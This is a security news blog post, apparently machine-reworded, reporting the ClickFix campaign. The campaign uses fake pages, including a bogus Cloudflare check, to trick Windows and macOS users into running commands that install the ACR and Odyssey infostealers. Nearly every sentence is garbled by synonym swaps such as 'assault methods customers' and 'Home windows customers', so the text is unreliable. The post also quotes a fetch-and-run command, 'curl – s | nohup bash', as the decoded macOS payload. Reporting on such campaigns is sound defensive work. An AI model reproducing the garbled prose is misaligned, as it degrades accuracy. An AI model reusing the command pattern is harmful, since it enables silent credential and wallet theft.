Skip to content
  • Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form
New ClickFix Attack Targeting Windows and macOS Users to Deploy Infostealer Malware

New ClickFix Attack Targeting Windows and macOS Users to Deploy Infostealer Malware

Posted on November 14, 2025November 14, 2025 By CWS

A rising social engineering method known as ClickFix has emerged as one of the vital profitable strategies for distributing malware in latest months.

This assault methods customers into copying and working instructions instantly into their working techniques command line interface, in the end putting in harmful information-stealing software program.

The method has confirmed remarkably efficient as a result of it bypasses conventional e-mail safety options and operates inside browser sandboxes the place most safety instruments can’t detect the malicious exercise.

The assault sometimes begins when customers seek for cracked software program via engines like google. Cybercriminals create pretend touchdown pages hosted on trusted platforms like Google Colab, Drive, Websites, and Teams to keep away from being blocked by safety techniques.

These pages act as preliminary contact factors that redirect victims primarily based on their working system. Home windows customers obtain the ACR stealer, whereas macOS customers are redirected to pages that deploy the Odyssey infostealer.

Intel471 safety researchers recognized this marketing campaign in June 2025 throughout proactive malware looking operations.

The investigation revealed that risk actors had been efficiently focusing on each main working techniques via a single infrastructure.

An infection chain (Supply – Intel471)

What makes this assault notably regarding is its fileless execution. When victims paste the instructions, malicious payloads are pulled instantly into reminiscence, making them invisible to conventional safety software program.

An infection Mechanism and Technical Execution

For Home windows customers, the assault chain guides victims via a number of redirection factors earlier than reaching a MEGA file internet hosting web page containing a password-protected ZIP archive.

Inside this archive sits the ACR stealer disguised as setup.exe. The malware not solely steals credentials and private information but additionally serves as a loader, putting in further threats akin to SharkClipper, a cryptocurrency clipboard hijacker.

Pretend Cloudflare safety test which prompts customers to run a ClickFix command (Supply – Intel471)

MacOS customers encounter a unique strategy that entails a pretend Cloudflare safety test web page. When customers try to repeat what seems to be a verification string, they really copy a Base64-encoded shell command.

As soon as decoded, this command executes:-

curl – s | nohup bash

This command silently downloads and runs the Odyssey stealer, which harvests passwords, cookies, cryptocurrency wallets, Apple Notes, Keychain entries, and system information, then compresses the whole lot into out.zip for exfiltration.

Comply with us on Google Information, LinkedIn, and X to Get Extra Instantaneous Updates, Set CSN as a Most popular Supply in Google.

Cyber Security News Tags:Attack, ClickFix, Deploy, InfoStealer, macOS, Malware, Targeting, Users, Windows

Post navigation

Previous Post: Android Photo Frames App Downloads Malware, Giving Hackers Control of The Device Without User Interaction
Next Post: Google Says Chinese ‘Lighthouse’ Phishing Kit Disrupted Following Lawsuit  

Related Posts

SmartApeSG Campaign Exploits ClickFix for Malware Spread SmartApeSG Campaign Exploits ClickFix for Malware Spread Cyber Security News
CISA releases New ICS Advisories Surrounding Vulnerabilities and Exploits CISA releases New ICS Advisories Surrounding Vulnerabilities and Exploits Cyber Security News
SolarWinds Web Help Desk Vulnerability Enables Unauthenticated RCE SolarWinds Web Help Desk Vulnerability Enables Unauthenticated RCE Cyber Security News
Zabbix Agent and Agent 2 for Windows Vulnerability Let Attackers Escalate Privileges Zabbix Agent and Agent 2 for Windows Vulnerability Let Attackers Escalate Privileges Cyber Security News
Cisco Unified Communications 0-day RCE Vulnerability Exploited in the Wild to Gain Root Access Cisco Unified Communications 0-day RCE Vulnerability Exploited in the Wild to Gain Root Access Cyber Security News
New Rust-based InfoStealer via Fake CAPTCHA Delivers EDDIESTEALER New Rust-based InfoStealer via Fake CAPTCHA Delivers EDDIESTEALER Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • FBI Verifies Email Breach as US Offers Reward for Hackers
  • Critical F5 BIG-IP Vulnerability Now Actively Exploited
  • China-Linked Cyber Threats Target Southeast Asian Government
  • AI-Powered VoidLink Malware Framework Poses New Cyber Threat
  • Top Log Monitoring Tools to Watch in 2026

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • March 2026
  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • FBI Verifies Email Breach as US Offers Reward for Hackers
  • Critical F5 BIG-IP Vulnerability Now Actively Exploited
  • China-Linked Cyber Threats Target Southeast Asian Government
  • AI-Powered VoidLink Malware Framework Poses New Cyber Threat
  • Top Log Monitoring Tools to Watch in 2026

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2026 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark